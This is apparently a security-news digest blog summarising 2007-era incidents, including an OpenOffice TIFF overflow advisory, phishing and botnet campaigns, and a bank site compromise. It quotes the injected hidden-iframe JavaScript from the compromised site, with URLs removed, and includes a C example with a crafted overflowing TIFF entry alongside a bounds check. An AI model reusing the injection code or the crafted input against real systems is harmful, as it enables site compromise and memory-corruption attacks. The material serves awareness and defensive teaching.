OpenOffice 2 TIFF Parsing Integer Overflow Vulnerabilities

Description:
Some vulnerabilities have been reported in OpenOffice, which potentially can be exploited by malicious people to compromise a user’s system.

The vulnerabilities are caused by integer overflows when processing certain tags within TIFF images. This can be exploited to cause heap-based buffer overflows by e.g. tricking a user into opening a specially crafted document.

Successful exploitation may allow the execution of arbitrary code.

The vulnerabilities are reported in versions prior to 2.3.
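The bug class the advisory describes, as an added C illustration (not OpenOffice's code; the advisory names no specific tag, so the IFD entry, the wrapping length calculation and the checked replacement are assumptions):

```c
#include <stdint.h>
#include <stdio.h>

/* Byte width of a TIFF field type (BYTE=1, ASCII=2, SHORT=3, LONG=4, RATIONAL=5);
   0 for a type this example does not handle, so callers can reject it. */
static uint32_t tiff_type_size(uint16_t type) {
    switch (type) {
    case 1: case 2: return 1;
    case 3: return 2;
    case 4: return 4;
    case 5: return 8;
    default: return 0;
    }
}

/* Type and count fields of a little-endian 12-byte IFD entry (tag, type, count, value). */
uint16_t ifd_entry_type(const uint8_t e[12]) { return (uint16_t)(e[2] | e[3] << 8); }
uint32_t ifd_entry_count(const uint8_t e[12]) {
    return (uint32_t)e[4] | (uint32_t)e[5] << 8 | (uint32_t)e[6] << 16 | (uint32_t)e[7] << 24;
}

/* Vulnerable pattern (assumed for illustration, not OpenOffice's code): the tag's
   byte length is computed in 32 bits and wraps, so a huge count produces a tiny
   heap buffer that a later copy of count*size elements overruns. */
uint32_t tag_bytes_unchecked(uint16_t type, uint32_t count) {
    return tiff_type_size(type) * count;   /* wraps modulo 2^32 */
}

/* Hardened form: reject unknown types, empty tags and any count whose product
   is not representable; returns -1 on rejection so nothing is allocated. */
int64_t tag_bytes_checked(uint16_t type, uint32_t count) {
    uint32_t size = tiff_type_size(type);
    if (size == 0 || count == 0) return -1;
    if (count > UINT32_MAX / size) return -1;   /* size * count would overflow */
    return (int64_t)size * count;
}

/* Constructed malicious entry: type 5 (RATIONAL, 8 bytes), count 0x20000001,
   so 8 * count = 0x100000008, which truncates to 8 in 32 bits. */
const uint8_t SAMPLE_ENTRY[12] = { 0x00, 0x01,  0x05, 0x00,
                                   0x01, 0x00, 0x00, 0x20,  0x00, 0x00, 0x00, 0x00 };

int main(void) {
    uint16_t t = ifd_entry_type(SAMPLE_ENTRY);
    uint32_t c = ifd_entry_count(SAMPLE_ENTRY);
    printf("unchecked length: %u bytes\n", tag_bytes_unchecked(t, c));       /* 8 */
    printf("checked length: %lld\n", (long long)tag_bytes_checked(t, c));    /* -1 */
    return 0;
}
```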

Solution:
Update to version 2.3.

http://secunia.com/advisories/26816/ 

Hacker Gained Access To Data On Millions Of TD Ameritrade Customers

Online brokerage TD Ameritrade Holding Corp. announced today that a hacker broke into one of its databases and stole personally identifying information for some of its 6.3 million customers.

An online advisory and letters to account holders disclosed that names, e-mail addresses, phone numbers and home addresses were taken in the data breach. Client assets, along with user IDs, personal identification numbers and passwords, were not stored in the compromised database.

Full Story at informationweek.com 

Windows worm targets Skype users

An instant-messaging worm has started spreading to PCs running Windows by using Skype to chat up potential victims in an attempt to convince them to download and run the malicious software.

The worm, described in a blog post written by eBay’s Skype subsidiary, can converse with victims in at least three different languages: Latvian, Russian, and English. Antivirus firms and eBay have already assigned a plethora of names to the digital pest, including Ramex (Skype), Pykspa (Symantec), Skipi (F-Secure), and Pykse (McAfee and others).

http://www.securityfocus.com/brief/586 

Custom-built botnet steals eBay accounts

Online auction site eBay has been targeted by identity thieves, who are wielding a botnet that uses brute force to uncover valid account login info, an Israeli security company said Monday.

The attacks against eBay may have started as long ago as early August, said Ofer Elzam, of Aladdin Knowledge Systems Ltd. Elzam and his researchers have not been successful in notifying eBay of their weekend findings.

According to Elzam, the product manager of Aladdin’s eSafe threat protection line, the brute force attacks are launched by a large botnet that the identity thieves have built using a sophisticated, multi-stage campaign that begins with compromised legitimate Web sites.

Story continues at computerworld.com 

Better Business Bureau Scam Updated

Websense® Security Labs™ has received reports of a new variant of an email attack that was originally launched early this year. The spoofed email purports to be from the Better Business Bureau (BBB). The message claims that a complaint has been filed against the recipient’s company.

Previously, the email attack contained an attachment that the victim would need to open in order to become infected. The new variant is slightly different.

The new message uses a tactic employed by other, more-successful email attacks, such as the recent Storm worm. Instead of including an attachment in the email, the body of the email contains a link to an external Web site from which the payload is downloaded if the link is accessed. This method allows the attack to bypass many attachment filters at the email gateway.

Link to our previous BBB alert:
http://www.websense.com/securitylabs/alerts/alert.php?AlertID=777

Details … 

Storm adds YouTube lures

The Storm Trojan / Bot continues to spread and is now using a YouTube video to lure users. The latest version has a variety of subjects and email bodies but now uses the filename video.exe.

Email subject example: Sheesh man what are you thinkin.

Upon connecting to the URL, which is referenced as a YouTube link but is actually a Storm IP, the same exploit code used in past attacks attempts to run. As in the past, if users are not vulnerable, they will get a page displayed that requests they run the code manually, such as in the screenshot below:

Websense Alert

Attackers probing for vulnerable Windows servers

Attackers are probing for Windows servers running Trend Micro Inc.’s ServerProtect antivirus software, researchers warned.

Early today, Symantec Corp.’s DeepSight threat network monitored a major spike in traffic over TCP port 5168, which is related to the remote procedure call service in ServerProtect. “This may indicate an ongoing mass-scanning and exploitation attempt trying to exploit vulnerable systems for the newly disclosed vulnerabilities,” said Symantec analyst Pukhraj Singh in an alert issued to corporate customers.

Continues at computerworld.com 

Syndicate Bank site compromised

Websense® Security Labs™ has discovered that the official site for the Indian Syndicate Bank (www.syndicatebank.in) was compromised with a malicious script that attempts to exploit multiple vulnerabilities. When customers visit the web site, a malicious JavaScript file (e.js) is executed and creates two additional iframes in the page.

<script src=http://< URL REMOVED >/e.js></script>

Snippet of js code:

document.writeln("\/\/xxxx mca By Mr.0wen\/\/");
document.writeln("document.write(unescape(\"%3CIFraMe < URL REMOVED >IFraMe < URL REMOVED >wIdth%3D%220%22%20heIght%3D%220%22%20FraMebOrder %3D%220%22%3E%3C\/IFraMe%3E\"));");
document.writeln("\/\/xxxx mca By Mr.0wen\/\/");

The JavaScript from e.js (seen above) creates two new IFRAME elements within the page. One IFRAME attempts to load exploit code and the other creates several additional IFRAMEs that contain advertisement-related content. The exploit will try to load a Trojan Downloader (qq.exe) which will contact a remote server to download the following Trojan Downloader and Backdoor:

http://< URL REMOVED >/hxw/hx/200512.exe
http://< URL REMOVED >/hxw/hx/dd.exe

The site appears to have been cleaned a few hours ago.

Zero-Day Bug In Yahoo Messenger Pops Up

Researchers at McAfee are reporting that they’ve reproduced a reported zero-day vulnerability in the Yahoo Messenger Webcam.

Karthik Raman, a researcher with McAfee, first reported in a Tuesday blog entry that Chinese researchers were claiming to have found a zero-day bug in Yahoo Messenger. On Wednesday, Raman’s fellow McAfee researcher Wei Wang noted in a blog entry that they have been able to reproduce the vulnerability on Messenger V8.1.0.413.

Continues at informationweek.com 

Storm Warning: Worm Threat Escalates

The Storm worm has grown into an online siege 10 times larger than any other e-mail attack in the last two years, amassing a botnet of nearly 2 million computers, with worrying implications, researchers say.

Before Storm, an average day saw about 1 million virus-laden e-mails crossing the Internet, says Adam Swidler, senior manager of software security firm Postini. On July 24, researchers tracked 46.2 million malicious messages, more than 99% of them from the Storm worm.

The number of zombie computers the Storm worm authors have amassed has skyrocketed in the past two months, says SecureWorks senior researcher Joe Stewart. From the first of January to the end of May, there were 2,815 bots launching Storm attacks. By the end of July, that number had leaped to 1.7 million. “It’s been building with exponential growth,” says Stewart. “It’s one of the largest botnets I’ve ever heard of.”

Continues at informationweek.com 


© 2014 DP's Security Bits.